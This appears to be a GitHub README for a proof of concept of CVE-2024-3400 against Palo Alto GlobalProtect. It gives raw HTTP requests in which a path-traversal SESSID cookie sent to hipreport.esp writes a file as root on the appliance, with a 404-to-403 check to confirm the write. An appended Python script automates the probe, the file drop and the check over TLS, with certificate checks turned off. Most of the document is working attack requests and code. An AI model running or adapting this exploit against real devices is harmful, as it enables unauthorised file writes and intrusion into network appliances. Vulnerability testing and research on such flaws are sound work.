0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection

#Steps:


#1. Check whether the marker file (0xr2r.txt) is already present on the device by sending the GET request below, or by opening

https://domain.com/global-protect/portal/images/0xr2r.txt

in a browser. A 404 response means the file is not present yet (pick a different file name if you get anything other than 404 at this point, otherwise step 3 proves nothing).




GET /global-protect/portal/images/0xr2r.txt HTTP/1.1
Host: domain.com

#2. Now drop the marker file (0xr2r.txt) on the device with the POST request below. The value of the SESSID cookie is used to build a file path on the appliance, so the traversal sequence in the cookie places the file under the given path, and it is created with root privileges. Note that the Content-Length must match the body exactly (170 bytes for the body shown).



POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 170

user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r


#3. Now request the marker file again with the same GET as in step 1. You should receive a 403 instead of a 404: the path now exists but the web server is not allowed to serve it, which shows that the file (0xr2r.txt) was created on the device by a process running as root.



GET /global-protect/portal/images/0xr2r.txt HTTP/1.1
Host: domain.com
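The three steps above as one script, added here as an example and not part of this repository: it builds the same raw requests, computes Content-Length from the body instead of typing it by hand, sends them over TLS, and interprets the 404/403 pair the way the steps do. The host, port 443, the marker name and the self-signed-certificate handling are assumptions; step 2 writes a file on the appliance, so only run it against a device you are authorised to test.

```python
"""Three-step file-drop check for CVE-2024-3400, as raw HTTP over TLS.

Added example, not the repository's own code. Assumes HTTPS on port 443,
a marker name you choose, and a target you are authorised to test: step 2
writes a file on the appliance.
"""
import socket
import ssl
from urllib.parse import urlencode

# Paths taken from the README's requests.
IMAGES_DIR = "/var/appweb/sslvpndocs/global-protect/portal/images"
WEB_PATH = "/global-protect/portal/images"
HIP_ENDPOINT = "/ssl-vpn/hipreport.esp"


def traversal_cookie(filename):
    """SESSID value that escapes the session directory into the web root.
    Three '..' segments, exactly as in the README."""
    return "SESSID=/../../..%s/%s" % (IMAGES_DIR, filename)


def probe_request(host, filename):
    """Raw GET for the marker file (used before and after the drop)."""
    return ("GET %s/%s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n"
            % (WEB_PATH, filename, host))


def hip_body(marker, authcookie):
    """Form body from the README; field order is kept so the length matches."""
    fields = [("user", marker), ("portal", marker), ("authcookie", authcookie),
              ("domain", marker), ("computer", marker), ("client-ip", marker),
              ("client-ipv6", marker), ("md5-sum", marker),
              ("gwHipReportCheck", marker)]
    return urlencode(fields)


def hip_request(host, marker, authcookie, filename):
    """Raw POST to hipreport.esp carrying the traversal cookie.
    Content-Length is computed from the body rather than typed by hand."""
    body = hip_body(marker, authcookie)
    return ("POST %s HTTP/1.1\r\n"
            "Host: %s\r\n"
            "Cookie: %s\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            "Content-Length: %d\r\n"
            "Connection: close\r\n"
            "\r\n%s" % (HIP_ENDPOINT, host, traversal_cookie(filename),
                        len(body), body))


def verdict(before, after):
    """Interpret the two probe status codes the way the README steps do."""
    if before != 404:
        return "marker already present before the test; choose another name"
    if after == 403:
        return "file created: the path from SESSID was written on the device"
    if after == 404:
        return "no change: the cookie path was not written"
    return "unexpected status after drop: %d" % after


def send_raw(host, raw, port=443, timeout=10):
    """Send one raw request over TLS and return the HTTP status code."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False          # assumption: self-signed appliance cert
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            tls.sendall(raw.encode())
            status_line = tls.recv(4096).split(b"\r\n", 1)[0]
    return int(status_line.split()[1])


def run(host, marker="0xr2r",
        authcookie="284ad748-7ce2-4753-a39a-aa381b18cf70"):
    """Probe, drop, probe again; returns (before, after, verdict)."""
    filename = marker + ".txt"
    before = send_raw(host, probe_request(host, filename))
    send_raw(host, hip_request(host, marker, authcookie, filename))
    after = send_raw(host, probe_request(host, filename))
    return before, after, verdict(before, after)


if __name__ == "__main__":
    import sys
    print(run(sys.argv[1]))
```

Run it as `python3 check.py domain.com`. The verdict only trusts a 404-then-403 transition; if the first probe is not a 404 the marker name is already taken and the result would be meaningless, which is why the script refuses to interpret it.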
